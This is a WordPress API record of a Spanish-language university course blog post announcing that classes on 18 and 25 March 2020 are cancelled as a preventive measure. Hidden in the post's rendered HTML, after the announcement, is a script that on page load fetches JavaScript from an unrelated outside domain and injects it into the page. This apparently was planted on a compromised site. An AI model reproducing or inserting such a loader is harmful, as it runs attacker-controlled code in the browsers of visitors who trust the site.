{"id":396,"date":"2020-03-16T17:28:34","date_gmt":"2020-03-16T20:28:34","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=396"},"modified":"2025-06-21T12:05:22","modified_gmt":"2025-06-21T15:05:22","slug":"sin-dictado-de-clases-el-18-y-el-25-de-marzo","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2020\/03\/16\/sin-dictado-de-clases-el-18-y-el-25-de-marzo\/","title":{"rendered":"Sin dictado de Clases el 18 y el 25 de Marzo"},"content":{"rendered":"\n<p>La C\u00e1tedra se adhiere a lo dispuesto por autoridades nacionales de Educaci\u00f3n y como modo de prevenci\u00f3n.<\/p>\n\n\n\n<p>Por lo que los d\u00edas mi\u00e9rcoles 18 de marzo y el 25 del mismo mes, no habr\u00e1 dictado de clases.<\/p>\n\n\n\n<p>Estar atento a las entradas de este blog<\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>La C\u00e1tedra se adhiere a lo dispuesto por autoridades nacionales de Educaci\u00f3n y como modo de prevenci\u00f3n. Por lo que los d\u00edas mi\u00e9rcoles 18 de marzo y el 25 del mismo mes, no habr\u00e1 dictado de clases. Estar atento a las entradas de este blog<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15,6,16,9,7],"tags":[],"class_list":["post-396","post","type-post","status-publish","format-standard","hentry","category-consultas","category-cursado","category-diseno-grafico","category-diseno-industrial","category-faud"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/396","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=396"}],"version-history":[{"count":2,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/396\/revisions"}],"predecessor-version":[{"id":859,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/396\/revisions\/859"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=396"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=396"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=396"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}